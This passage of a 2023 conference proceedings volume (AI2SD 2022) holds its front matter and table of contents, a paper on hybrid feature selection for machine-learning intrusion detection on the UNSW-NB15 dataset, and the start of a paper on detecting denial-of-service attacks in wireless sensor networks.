Mohamed Amine Boudia, Algeria Mebarka Yahlali, Algeria

Organization

Hasna Bouazza, Algeria Zakaria Bendaoud, Algeria Naila Fares, Spain Brahim Aksasse, Morocco Mustapha Maatouk, Morocco Abdel Ghani Laamyem, Morocco Abdessamad Bernoussi, Morocco

xvii

Acknowledgement

This book is the result of many efforts combined with subtle and strong contributions more particularly from the General Chair of AI2SD’2022 Professor Mostafa EZZIYYANI from Adelmalek Essaadi University, the distinguished honorary Chair Academician Janusz KACPRZYK from the Polish Academy of Sciences, and Co-Chair Professor Valentina EMILIA BALAS, Aurel Vlaicu University of Arad, ROMANIA. The scientific contribution published throughout this book could never be so revolutionary without the perpetual help and the limitless collaboration of several actors who supreme is precisely the high patronage of his majesty King Mohammed VI, who in addition to his undeniable support in all the production and scientific inspiration processes, he provided us with all the logistical and technical means in the smallest needs presented during the organization of the event and the publication of this book. The deep acknowledgment addressed to ENSAM school embodied by its director Pr. Khalid BIKRI for his prestigious inputs and the valuable contributions provided by Pr. Wajih RHALEM and by all the faculty members and his engineering students have prepared a fertile ground for presentation and exchange resulting in rigorous articles which are published in this volume. Great thanks to the Director General of the Organization of the Islamic World for Education, Science, and Culture (ICESCO) presented by its Director General Dr. Salim M. Al MALIK for their collaboration, their support, and for the distinguished welcome of the researchers and guests from the AI2SD’2022 conference. The appreciation is addressed to Dr. Omar HALLI advisor of the Director General of ICESCO for His excellent role in coordinating the organization of the AI2SD’2022 edition at ICESCO. The dedication inevitably concerns the organizing committee managed by General Chair Professor Mostafa EZZIYYANI, the VIP coordinator Professor Mohammed Rida ECH-CHARRAT, the scientific committee coordinator Professor Loubna CHERRAT, the Ph.D. student organization committee coordinator Mr. Abderrahim EL YOUSSEFI, and all professors and doctoral students for their constant efforts for the organization, maintenance of the relationship with researchers and collaborators, and also in the publication process.

Contents

Two Levels Feature Selection Approach for Intrusion Detection System . . . . . . . Aouatif Arqane, Omar Boutkhoum, Hicham Boukhriss, and Abdelmajid El Moutaouakkil Method of Detecting Denial of Service Attacks in WSNs While Optimizing Network Life Span . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Rayri Yassine, Hatim Kharraz Aroussi, and Omar Zenzoum Numerical Investigation into the Vertical Dynamic Behavior of Railway Tracks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Rhylane Hajar, Zougari Ayoub, Ben Abdellah Abdellatif, and Ajdour Mounia

1

9

15

A Lightweight, Multi-layered Internet Filtering System . . . . . . . . . . . . . . . . . . . . . Ali Sadiqui and Filali Moulay Rachid

29

Tracking Methods: Comprehensive Vision and Multiple Approaches . . . . . . . . . . Anass Ariss, Imane Ennejjai, Nassim Kharmoum, Wajih Rhalem, Soumia Ziti, and Mostafa Ezziyyani

40

Multi-blockchain Scheme Based on IoT and Smart Contracts in the Agricultural Field for Data Management . . . . . . . . . . . . . . . . . . . . . . . . . . . . Adil El Mane, Redouan Korchiyne, Omar Bencharef, and Younes Chihab

55

A Geometry-Based Analytical Model for Vehicular Visible Light Communication Channels . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Fatima Zahra Raissouni and Abdeljabbar Cherkaoui

64

Mapping Review of Research on Supply Chains Relocation . . . . . . . . . . . . . . . . . Mouna Benfssahi, Nordine Sadki, Zoubir El Felsoufi, and Abdelhay Haddach A Predictive Maintenance System Based on Vibration Analysis for Rotating Machinery Using Wireless Sensor Network (WSN) . . . . . . . . . . . . . Imane El Boughardini, Meriem Hayani Mechkouri, and Kamal Reklaoui

73

93

A Comparative Study of Vulnerabilities Scanners for Web Applications: Nexpose vs Acunetix . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 107 Bochra Labiad, Mariam Tanana, Abdelaziz Laaychi, and Abdelouahid Lyhyaoui

xxii

Contents

The Pulse-Shaping Filter Influence over the GFDM-Based System . . . . . . . . . . . . 118 Karima Ait Bouslam, Jamal Amadid, Radouane Iqdour, and Abdelouhab Zeroual Intrusion Detection Systems in Internet of Things Using Machine Learning Algorithms: A Comparative Study . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 132 Hdidou Rachid, El Alami Mohamed, and Drissi Ahmed Generative Adversarial Networks for IoT Devices and Mobile Applications Security . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 145 Akram Chhaybi, Saiida Lazaar, and Mohammed Hassine The Indoor Localization System Based on Federated Learning and RSS Using UWB-OFDM . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 152 Youssef Ibnatta, Mohammed Khaldoun, and Mohammed Sadik Artificial Intelligence for Smart Decision-Making in the Cities of the Future . . . 168 Youssef Mekki, Chouaib Moujahdi, Noureddine Assad, and Aziz Dahbi Performance Comparison of Localization Techniques in Term of Accuracy in Wireless Sensor Networks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 179 Omar Arroub, Anouar Darif, Rachid Saadane, and Moly Driss Rahmani Fog Computing Model Based on Queuing Theory . . . . . . . . . . . . . . . . . . . . . . . . . . 191 Hibat Eallah Mohtadi, Mohamed Hanini, and Abdelkrim Haqiq From Firewall and Proxy to IBM QRadar SIEM . . . . . . . . . . . . . . . . . . . . . . . . . . . 199 Yasmine El Barhami, Hatim Kharraz Aroussi, and Chaimae Bensaid IoT-Based Approach for Wildfire Monitoring and Detection . . . . . . . . . . . . . . . . . 205 Mounir Grari, Idriss Idrissi, Mohammed Boukabous, Mimoun Yandouzi, Omar Moussaoui, Mostafa Azizi, and Mimoun Moussaoui A Decision-Making Model Based on a High-Level Ontology in Context of a Smart Home . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 214 Mohamed El Hamdouni, Yasser Mesmoudi, and Abderrahim Tahiri Integration of the Human Factor in the Management and Improvement of Performance of Production Systems: An Exploratory Literature Review . . . . . 220 Saloua Farouq, Reda Tajini, and Aziz Soulhi Securing Caesar Cryptography Using the 2D Geometry . . . . . . . . . . . . . . . . . . . . . 230 Fatima Zohra Ben Chakra, Hamza Touil, and Nabil El Akkad

Contents

xxiii

A Comparative Study of Neural Networks Algorithms in Cyber-Security to Detect Domain Generation Algorithms Based on Mixed Classes of Data . . . . 240 Mohamed Hassaoui, Mohamed Hanini, and Said El Kafhali A Literature Review of Digital Technologies in Supply Chains . . . . . . . . . . . . . . . 251 Rachid El Gadrouri IoT Systems Security Based on Deep Learning: An Overview . . . . . . . . . . . . . . . . 266 El Mahdi Boumait, Ahmed Habbani, and Reda Mastrouri Deep Learning for Intrusion Detection in WoT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 272 Abdelaziz Laaychi, Mariam Tanana, Bochra Labiad, and Abdelouahid Lyhyaoui Artificial Intelligence Applications in the Global Supply Chain: Benefits and Challenges . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 282 Ikram Lebhar, Afaf Dadda, and Latifa Ezzine Fault Detection and Diagnosis in Condition-Based Predictive Maintenance . . . . 296 Oumaima El Hairech and Abdelouahid Lyhyaoui Agile Practices in Iteration Planning Process of Global Software Development . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 302 Hajar Lamsellak, Amal Khalil, Mohammed Ghaouth Belkasmi, and Mohammed Saber Sensitive Infrastructure Control Systems Cyber-Security: Literature Review . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 310 Tizniti Douae and Badir Hassan Design of SCMA Codebook Based on QAM Segmentation Constellation . . . . . . 320 Afilal Meriem, Hatim Anas, Latif Adnane, and Arioua Mounir Towards an Optimization Model for Outlier Detection in IoT-Enabled Smart Cities . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 328 Moulay Lakbir Tahiri Alaoui, Meryam Belhiah, and Soumia Ziti Performance Analysis of Static and Dynamic Clustering Protocols for Wireless Sensor Network . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 339 El Idrissi Nezha and Najid Abdellah A Comprehensive Study of Integrating AI-Based Security Techniques on the Internet of Things . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 348 Adnan El Ahmadi, Otman Abdoun, and El Khatir Haimoudi

xxiv

Contents

Semantic Segmentation Architecture for Text Detection with an Attention Module . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 359 Soufiane Naim and Noureddine Moumkine Car Damage Detection Based on Mask Scoring RCNN . . . . . . . . . . . . . . . . . . . . . 368 Farah Oubelkas, Lahcen Moumoun, and Abdellah Jamali Blockchain and IoT for Real-Time Decision Support for the Optimization of Maritime Freight Transport Networks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 377 M. H. Rziki, N. Mansour, A. E. Boukili, and M. B. Sedra MQTT Protocol Analysis According to QoS Levels and SSL Implementation for IoT Systems . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 390 Mouna Boujrad, Mohammed Amine Kasmi, and Noura Ouerdi New Analytical Method to Classify Areas According to Signal Quality and Coverage of GSM Network . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 404 Ibrahim El Moudden, Abdellah Chentouf, Loubna Cherrat, Wajih Rhalem, Mohammed Rida Ech-charrat, and Mostafa Ezziyyani Neural Network Feature-Based System for Real-Time Road Condition Prediction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 418 Youssef Benmessaoud, Loubna Cherrat, Mohamed Rida Ech-charrat, and Mostafa Ezziyyani Author Index . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 433

Two Levels Feature Selection Approach for Intrusion Detection System Aouatif Arqane(B) , Omar Boutkhoum, Hicham Boukhriss, and Abdelmajid El Moutaouakkil LAROSERI Laboratory, Chouaib Doukkali University, El Jadida, Morocco [email protected], [email protected]

Abstract. The sophisticated and massive intrusions are the most challenging threats that cybersecurity experts must deal with every day. Fortunately, the use of machine learning models with an intrusion detection system (IDS) contributes to enhancing and strengthening the defense mechanism of networks and IT infrastructures. However, training a model with a large number of features or with irrelevant ones can significantly diminish the detection rate of attacks. Thus, many feature selection methods are applied to select the best feature subset. In this scope, this study presents a two levels feature selection technique to improve the performance of IDS based on Correlation, Mutual Information, and ANOVA along with Sequential Forward Selection. Furthermore, five notable machine learning classifiers were utilized to test the efficiency and reliability of this technique. In light of experiments performed on the UNSW-NB15 dataset, the achieved accuracy reached 99% which outperforms other methods in recent researches. Keywords: Feature Selection · IDS · Correlation · Mutual Information · ANOVA · Sequential Forward Selection

1 Introduction Recently and because of the excessive application of the internet in practically all fields, the number and the intricacy of attacks expanded dramatically. Subsequently, it is highly needed to deploy efficient technologies to constantly monitor the network and guarantee the integrity, confidentiality, and availability of sensitive information. As indicated by security managers, the Intrusion Detection System (IDS) is one of the most reliable tools to protect systems and networks against potential security threats and unapproved access. Typically, IDS is a hardware appliance or software application that examines the network traffic, recognizes and sends an alert when malignant activities are distinguished. Based on the detection method, the IDSs can be partitioned into two types: signaturebased IDS and anomaly-based IDS. Signature-based IDS relies on pre-stored rules or patterns to instantly detect known types of attacks with minimum false alarm rate. However, it is unable to distinguish novel attacks scenarios which reduces its efficiency in real-world cases. On the other hand, anomaly-based IDS can detect new and unfamiliar © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 J. Kacprzyk et al. (Eds.): AI2SD 2022, LNNS 712, pp. 1–8, 2023. https://doi.org/10.1007/978-3-031-35251-5_1

2

A. Arqane et al.

threats by building an anomaly profile which is a document with a report strengthening the typical behavior of the system, and any deviation from these practices is considered as a possible threat. Nevertheless, it is vulnerable to a high false alarm rate. Due to the limits of each sort of IDS, security specialists suggest taking benefits of both kinds by using them together at the same time and create efficient IDS. Even though IDS is considered as a fundamental defense component for traditional networks, it faces many challenges to meet the security requirements of modern networks that characterized by the constantly growing threats, along with complexity and variety of deployed technologies (the internet of things, network virtualization, multi-cloud environments…). Consequently, monitoring the enormous amount of traffic networks produced by multiple connected devices needs the exploitation of advanced technologies like artificial intelligence and especially Machine Learning (ML). However, the accuracy and detection performance of ML models decrease significantly when dealing with the great number of features in a dataset. Feature Selection (FS) is a well-known set of methods developed to reduce the number of features by removing redundant, irrelevant, and less informative ones while keeping the most important features. These methods are utilized to speed up the learning process, minimize the computational cost and prevent over-fitting issues. Generally, FS methods can be grouped into four categories: filter [1], wrapper [2], hybrid [3], and embedded [4] methods. More detailed information about this subject is included in the Sect. 2. The contributions of this study are as follows: • We propose a two levels method for FS that combines three filter-based methods and a wrapper-based method. The purpose of utilizing filter methods at the first level is to select the most important features according to each method which means diminishing the feature subset that the wrapper method will use to create the optimal feature subset. In this way, we gain the precision and efficiency of wrapper methods and avoid their main drawbacks: time and space complexity. • Assessing the method with five different classifiers on the UNSW-NB15 dataset demonstrates its effectiveness in providing the most relevant features to the given problem and thus increasing the detection capabilities of IDS. • The accuracy provided by our method when using a Random Forest (RF) classifier is better contrasted to numerous recent works on the same dataset.

2 Related Work The authors of [5] focused on improving the detection rate of anomalous activities in IoT networks. They used Recursive Feature Elimination (RFE) technique for FS and Synthetic Minority Over-Sampling (SMOTE) to tackle the problem of imbalanced data. The experiments performed on the CICIDS2017 and UNSW-15 datasets showed promising results. However, there is a risk that the model is overfitting since the scores of specificity, precision, recall, and F1-score for the CICIDS2017 dataset are 100. In [6], a genetic algorithm (GA) was used for FS along with a deep neural network in the detection step to design a general framework for Network IDS. The overall performance is good but the detection rate needs more enhancement. The CorrCorr approach

Two Levels Feature Selection Approach for Intrusion Detection System

3

was proposed in [7] to overcome the problem of multivariate correlation-based IDS. The method that depends on correlation achieved better results compared to Principal Component Analysis (PCA) technique. However, it does not remove redundant records, which means that the performance can decrease when using big datasets. In [8], a novel FS method, inspired by the XGBoost algorithm, was introduced. To evaluate the effectiveness of the obtained feature subset, the authors implemented five different ML algorithms: Logistic Regression (LR), Support Vector Machine (SVM), Decision Tree (DT), Artificial Neural Network (ANN), and k-Nearest-Neighbour (kNN). According to experiments, XGBoost-ANN had the best performance, while XGBoostDT and XGBoost-kNN showed improvement in their performance on unseen data.

3 Background on Feature Selection In this section, we introduce briefly the filter and wrapper methods utilized to design our FS approach. Filter methods use statistical measures, such as information, distance, dependency, and consistency to assess the relationship between each feature and the target variable and thus, classify the features as relevant or not. Likewise, they offer a better generalization, low computational complexity, and are independent of the learning algorithm performed to tackle the problem. Nonetheless, the resulted subset is not the optimal one. For this study, we utilized three types of filter methods that are described in the following part. Pearson’s correlation coefficient (PCC): is a value that ranges from [-1, 1] and measures the linear relationship or correlations between features and their classes. When two Features have a high correlation, they most likely give similar information concerning the target. Subsequently, one of them can be dropped. It is worthy to mention, correlation is adequate only for metric variables. Mutual Information (MI): is the amount of data acquired around one variable relying upon another random variable. In other words, MI is a positive value of reliance between two variables; the value zero indicates that the variables are independent. Analysis of Variance (ANOVA): is a parametric measurable hypothesis test that checks if two or more groups are fundamentally not quite the same as one another. For FS, it is used to determine the features that are independent of the target because they do not have predictive power for the target, and thus, they can be eliminated. Wrapper methods: depends on ML algorithms to select the best features subset. The features are fed to the chosen algorithm that can compute the score for features during the training process and pick the most important subsets. After that, the selected subsets must be validated by a validation technique like cross-validation. Even the fact that these methods provide subset with high quality, they are computationally costly, and slower in the case of large-scale datasets. Sequential Forward Selection (SFS): is an iterative method that belongs to the greedy search algorithms. The method starts by having a subset without any features. From that point onward, it adds new features iteratively and computes the performance of the model until it presumes that adding more features does not affect positively the performance. In

4

A. Arqane et al.

this way, the acquired features subset is the optimal one that contains the most relevant features to the problem.

4 Proposed Approach With the goal of enforcing the detection performance of IDS and reducing false alerts, we propose a two levels FS technique for ML-based IDS. The detection framework of the proposed methodology mainly consists of the following phases: Data pre-processing: the first stage is cleaning dataset from the noisy network traffic information and removing or replacing duplicate and missing values. Additionally, removing constant and redundant features is a necessary task. The goal of this stage is transforming raw data into a more appropriate format for modeling because most captured network traffics are not convenient for ML processing. The result of this process is a cleaned dataset. Feature selection: this stage is the core of the suggested methodology. It constructed from the combination of the three filter-based FS: PCC, MI and ANOVA, along with a wrapper-based FS technique which is SFS executed in two steps or levels to obtain the most informative features subset. In this first level, the system performs the three filter-based FS techniques individually on the cleaned dataset to obtain three different subsets. For the second level, the features of the three subsets are combined then top 50% of features are ranked based on the calculation of their importance. After that, the system uses the SFS on the reduced subset to choose the optimal feature subset that contains the most relevant features. Model training: Our main purpose in this research is providing an effective FS method to improve the detection rate of IDS. Thus, we implement and compare the results of on five various ML algorithms to evaluate the proposed approach (Fig. 1).

5 Experimental Setup In this section, the dataset, FS approach, algorithms for model training and performance measurements are introduced. The proposed system is implemented and evaluated on workstation with Windows 7, 8 GB RAM and fitted with IntelR CPU 3.5 GHz. Dataset: To train and test to performance of the model, UNSW-NB 15 dataset [9] was chosen. It consists of approximately 2540044 samples, divided into two partitions the training set with 175,341 instances and the testing set with 82,332 instances. Each instance contains 49 features grouped into five subgroups called Basic features, Time features, Flow features, Content features, and Additional generated features. Also, it includes nine types of attack: Backdoors Exploits, DoS, Fuzzers, Reconnaissance, Generic, Worms, Analysis, and Shellcode. Data pre-processing: The data pre-processing for the dataset is performed with a script written in Python. During this step, irrelevant data was removed and normalization, scaling, and encoding categorical attributes were performed.

Two Levels Feature Selection Approach for Intrusion Detection System

5

Fig. 1. Workflow of the proposed approach.

Feature selection: During FS process, we utilized script written in Python along with NumPy, Pandas, and Scikit-learn libraries. Model training and validation: Since this research focuses on FS, we prefer to use five well-known ML algorithms with default parameters of the Scikit-learn library. The chosen ML algorithms are: SVM with kernel = ‘rbf’, DT with max_depth = 3, RF with n_estimators = 1000, kNN with k = 5, and Gradient Boosting (GB). Performance metrics: The performance of the ML models is quantified by the following metrics: Accuracy, Precision, Recall and F-Score (F1).

6 Results and Comparative Analysis In this section, we illustrate the results of the multiple experiments conducted on the UNSW-NB15 dataset. Then, we deeply investigate the preference of the proposed method and compared it with other studies in the literature. 6.1 Results and Discussion During the first level of FS process, we obtained three different feature subsets. The subsets obtained by PCC, MI and ANOVA consist of 18, 14, and 12 features respectively. After the ranking and SFS executed on these subsets, we obtained an optimal subset

6

A. Arqane et al. Table 1. Obtained features by each step of feature selection

Method

Features names

Nb

PCC

dttl, sload, dload, swin, stcpb, dtcpb, smean, dmean„ response_body_len, sjit, djit, stime, ltime, tcprtt, ct_state_ttl, isftp_login, ct_srv_src, ct_dst_ltm,

18

MI

stcpb, dmean, synack, smean, ackdat, ct_srv_srv, ct_state_ttl, ct_dst_ltm, 14 ct_src_dport_ltm, response_body_len, ct_dst_sport_ltm, ct_src_ltm, rate, sbytes

ANOVA Proto, dwin,dttl, dloss, sinpkt, swin, stcpb, dtcpb, ct_dst_ltm, dmean, service, is_sm_ips_ports SFS

proto, service, sbytes, rate, dload, sjit, djit, tcprtt

12 8

composed of 8 features. Table exhibits the number and feature’s name obtained after each step. After several iterations of experiments and according to the results, the utilization of the FS method improves the performance measures of almost all classifiers except for GB which has the minimum improvement (Table 3). Table 2. Performance classification based on optimal features (8 features) Classifier

Accuracy (%)

Precision

Recall

F1_score

SVM

98.57

0.94

0.93

0.94

DT

97.01

0.92

0.81

0.86

RF

99.37

0.97

0.96

0.97

GB

95.34

0.83

0.82

0.83

KNN

95.40

0.96

0.97

0.97

Table 3. Performance classification based on original features (49 features) Classifier

Accuracy (%)

Precision

Recall

F1_score

SVM

96,47

0.96

0.81

0.91

DT

95,03

0.94

0.85

0.88

RF

96,76

0.85

0.89

0.90

GB

95,14

0.89

0.79

0.84

KNN

87,21

0.80

0.97

0.87

An interesting observation is that the execution RF classifier with the optimal features subset gives remarkable detection accuracy: 99.37% and promising measures for precision, recall, and F1_score. Also, the accuracy of KNN was highly increased from 87, 21% to 95.40% with the utilization of the most relevant features obtained by our

Two Levels Feature Selection Approach for Intrusion Detection System

7

method. However, we did not notice a great impact of this method on the GB classifier. The reason behind this result may be because this classifier relies on many attributes and parameters to optimize its performance but in this experiment, we chose to apply the minimum ones in order to evaluate the real efficiency of the proposed method. Tables 1 and 2 depict the performance measures obtained by implementing the aforementioned classifiers using 9 features and 49 features respectively. Figure 2 illustrates the accuracy measurements of the five classifiers when we use the proposed method (9 features) and without it (49 features). It is clearly visual that the utilization of the optimal features subset enhances the detection accuracy of all classifiers but in different proportions.

Fig. 2. Detection accuracy with and without using of FS method

6.2 Comparative Analysis The comparison between the presented method against some recent papers in the literature shows that performing the RF classifier with the optimal selected features outperformed all other classifiers with different FS techniques (Table 4). Table 4. Results comparison between present method and related work. Study

ML method

FS technique

Accuracy (%)

Precision

recall

[5]

SVM

RFE*

97

97

97

[6]

DNN**

Genetic algorithm

98.11

98.10

98.10

[7]



CorrCorr

93.22





[8]

kNN

XGBoost

94.73

80.31

95.09

Proposed method

RF

hybrid

99.37

97.04

96.87

*RFE = Recursive Feature Elimination **DNN = Deep neural network.

8

A. Arqane et al.

7 Conclusions and Future Work The present work has proved the importance of the hybrid FS methods to enhance the detection performance of IDS. In our system, we depend on an efficient FS method that is composed of correlation, mutual information, ANOVA, and sequential forward selection to minimize the feature set and a well-known ML algorithm for the classification stage. According to our experiments conducted on the UNSW-NB15 dataset, the utilization of the proposed FS method enhanced significantly the overall performance and provided higher accuracy rates for almost all tested classifiers. This method is principally developed for IoT devices to overcome the problem of limited execution resources when dealing with ML methods. Thus, minimizing the number of features means less training time and less computational resources. In future work, we intend to optimize the present FS method by combining other FS techniques. Also, we plan to evaluate its performance on several datasets and with multiple classifiers.

References 1. Sánchez-Maroño, N., Alonso-Betanzos, A., Tombilla-Sanromán, M.: Filter methods for feature selection – a comparative study. In: Yin, H., Tino, P., Corchado, E., Byrne, W., Yao, X. (eds.) IDEAL 2007. LNCS, vol. 4881, pp. 178–187. Springer, Heidelberg (2007). https://doi.org/10. 1007/978-3-540-77226-2_19 2. Soto, A.J., Cecchini, R.L., Vazquez, G.E., Ponzoni, I.: A wrapper-based feature selection method for ADMET prediction using evolutionary computing. In: Marchiori, E., Moore, J.H. (eds.) EvoBIO 2008. LNCS, vol. 4973, pp. 188–199. Springer, Heidelberg (2008). https://doi. org/10.1007/978-3-540-78757-0_17 3. Aburomman, A.A., Reaz, M.B.I.: A survey of intrusion detection systems based on ensemble and hybrid classifiers. Comput. Secur. 65, 135–152 (2017). https://doi.org/10.1016/j.cose.2016. 11.004 4. Yamada, S., Neshatian, K.: Comparison of embedded and wrapper approaches for feature selection in support vector machines. In: Nayak, A.C., Sharma, A. (eds.) PRICAI 2019. LNCS (LNAI), vol. 11671, pp. 149–161. Springer, Cham (2019). https://doi.org/10.1007/978-3-03029911-8_12 5. Ullah, I., Mahmoud, Q.H.: A two-level hybrid model for anomalous activity detection in IoT networks. In: 2019 16th IEEE Annual Consumer Communications Networking Conference (CCNC), pp. 1–6 (2019) 6. Keserwani, P.K., Govil, M.C., Pilli, E.S.: An effective NIDS framework based on a comprehensive survey of feature optimization and classification techniques. Neural Comput. Appl. 35, 1–21 (2021). https://doi.org/10.1007/s00521-021-06093-5 7. Gottwalt, F., Chang, E., Dillon, T.: CorrCorr: a feature selection method for multivariate correlation network anomaly detection techniques. Comput. Secur. 83, 234–245 (2019). https:// doi.org/10.1016/j.cose.2019.02.008 8. Kasongo, S.M., Sun, Y.: Performance analysis of intrusion detection systems using a feature selection method on the UNSW-NB15 dataset. J. Big Data 7(1), 1–20 (2020). https://doi.org/ 10.1186/s40537-020-00379-6 9. UNSW_NB15. https://kaggle.com/mrwellsdavid/unsw-nb15

Method of Detecting Denial of Service Attacks in WSNs While Optimizing Network Life Span Rayri Yassine(B) , Hatim Kharraz Aroussi, and Omar Zenzoum University Ibn Tofail, Kénitra, Morocco [email protected]

Abstract. The miniaturization of sensors, the increasingly low cost, the wide range of types of sensors available as well as the wireless communication medium used, allow sensor networks to develop in several fields of application. Sensor networks can be very useful in many applications when it comes to collecting and processing information from the environment. In addition, today these micro devices are among the main components of the Internet of Things (IoT) paradigm. Several constraints block the proper functioning of the wireless sensor network. These limitations motivate a large part of research problems in the field of wireless sensor networks (WSNs), in particular the energy and security constraints that are a fundamental problem. In sensor networks, it is essential that each sensor node and base station can verify that the data received was sent by a trusted sender and not by an adversary who tricked legitimate nodes into accepting fake data. False data can change the way a network might be predicted. Data integrity should be maintained. The data must not change and the precise data must reach the end of the user. In this paper, we tackle security problems in WSN. And we focus on protection against so-called “denial of service” attacks. So the aim of the work presented is therefore to propose a set of effective detection and reaction methods to denial of service attacks, while saving or distributing the energy consumption of the sensors as well as possible to extend the network’s operating time as much as possible. Keywords: Wireless sensor · Routing · Security · Energy

1 Introduction The Internet of Things is an interdependent system of mechanical and digital devices, objects, animals or people, with unique identifiers that allow data to be transferred over a network without the need for human or human computer interactions. The IoT environment allows users to manage and optimize electronic and electrical equipment via the Internet. Most interactions are between computers and other electronic equipments which are connected to each other and are exchanging information between them. It also significantly increases the number of “objects” relative to the number of active internet users. The IoT is using two types of elements to interact with the physical world: sensors and actuators. Sensors collect information from the physical world and © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 J. Kacprzyk et al. (Eds.): AI2SD 2022, LNNS 712, pp. 9–14, 2023. https://doi.org/10.1007/978-3-031-35251-5_2

10

R. Yassine et al.

transmit it to the computer system. Actuators allow the computer system to act on the physical world by changing its state. Of these two components, our work aims to improve the proper functioning of wireless sensors [1, 2]. Advances in microelectronics over the past decades along with developments in wireless communication technologies, have made it possible to produce extremely small sensors at a low cost. These devices can communicate, via radio waves and cooperate, with each other to form a Wireless Sensor Network (WSN). A wireless sensor network is made up of a large number of nodes, which collect environmental data and transmit it, through multi-hop routing, to one or more collection points, in an autonomous manner [3]. This new area of research provides a cost-effective and an easy-to-deploy solutions for remote monitoring and data processing in a complex and distributed environments. These networks are of particular interest for military, environmental, home automation, medical and critical infrastructure monitoring applications. These applications generally require a high degree of security. A wireless sensor network shares some popularity with typical computer networks, but also has its own unique requirements. In particular, due to their characteristics (lack of infrastructure, energy constraints, very limited computing and storage capacities, dynamic topology, large number of sensors, limited physical security, etc.). However, the energy consumption and security remains a challenge for the research community, because of its paramount importance to ensure a good performance of the network. In this current work, we focus on communication security issued in sensor networks, more specifically data routing security, to find approaches for protection against attacks targeting WSNs. For this reason, we propose a method of detecting and reacting to denial of service attacks. This approach will be applied to the LEACH-EDE (Leach-Equitable Distribution Energy) routing protocol treated in [4, 8].

2 Related Works 2.1 Protocol LEACH-EDE Definition. To reduce the functionalities of the cluster-head, we have proposed a new concept of routing (EDE protocol) based of Leach protocol [5], which consists in creating a node that is only responsible for data transfer. The cluster-head delegates the task of the transmission of packets to the base station to another node of the cluster. This node called Transfer-Node (TN) (Fig. 1). The EDE protocol process takes place on two phases same as the Leach protocol. In step up phase, we add the selection of TN node. Indeed, in a defined cluster, the energy capacity of the chosen Transfer Node must be greater than or equal to the energy of the cluster-head, otherwise, it will be TN. In addition, the exception of the steady up phase is the data transmission from CH to TN [4]. Performance. We have proposed a simulation with a variation in the number of sensor nodes, distributed randomly over an area of 100 m * 100 m. The simulations run under Matlab. We compare our protocol EDE with leach protocol [8]. We consider that all nodes have an equal initial energies and each death node excluded from the next round (Table 1).

Method of Detecting Denial of Service Attacks

11

Table 1. Parameters tables. Parameters

Value

Initial energy of nodes

0.2 J

Transmitter and receiver energy

50 nj/bit

Aggregation energy

5 nj/bit

Data packet length

4000 bit

amplifier energy Efs

10 pj/bit/m2

amplifier energy Eamp

0.0003 pj/bit/m4

Fig. 1. (a) Leach protocol where blue circles represent the member nodes, the black circles represent the cluster heads and the red dots represent the dead nodes, and for (b) EDE protocol where blue circles represent the member nodes, the red circles represent the cluster head, the green circles represent the transfer nodes and the red dots represent the dead nodes.

The Fig. 1 (a) shows clearly that the lower part of the Leach protocol network represents a black area where all the sensors are dead. Thus, we may not have the information of that area which is not covered by the sensors. The network in Fig. 1 (b) Processed by the EDE protocol shows that the dead nodes are distributed throughout the network. In other words, we don’t have a black zone. Therefore, we can have data collection over the entire surface of the network. 2.2 Denial of Service Attack The security of IT systems is unique, in that, it is a field that cuts across virtually every other area of IT, in the sense of securing an entire system, every layer, every technology used must be secure. Thus, network security in itself constitutes a whole field of study, which in turn breaks down into several issues.

12

R. Yassine et al.

Possible Attacks (Denial of Service). A so-called denial of service attack reported in a computer network is an attack carried out with the aim of harming the normal functioning of this network. There are many, ways to do this, and as a result there is a plethora of existing denial of service attacks. The state of the art in this field is unique, in that, it has two points of view: Attacker and defender. It is essential to define the attack model in order to be able to propose adequate countermeasures. And more or less reciprocally, the protection mechanisms put in place over time push attackers to develop new attacks to bypass them. The most possible attacks are [6, 10]: • Radio interference, particularly at the physical level, to neutralize communications. • Certain routing attacks and in particular sinkhole type attacks, to penalize communications but also and above all for the parasitic collection of data. • Battery depletion attacks or the physical destruction of sensors, to put the network out of service permanently. • Corruption of data sent to the operator, to provide him with erroneous results and influence his decision-making. Detection Methods. Once the network is deployed, and the intrusion detection system is in place, the nodes responsible for monitoring the network analyze the surrounding traffic and draw inferences about the condition of the network. These deductions are the result of applying precise algorithms to the data. These algorithms are of several kinds, which can be grouped together in detection methods based on anomalies, on attack signatures, or on non-compliance with predefined specifications [7].

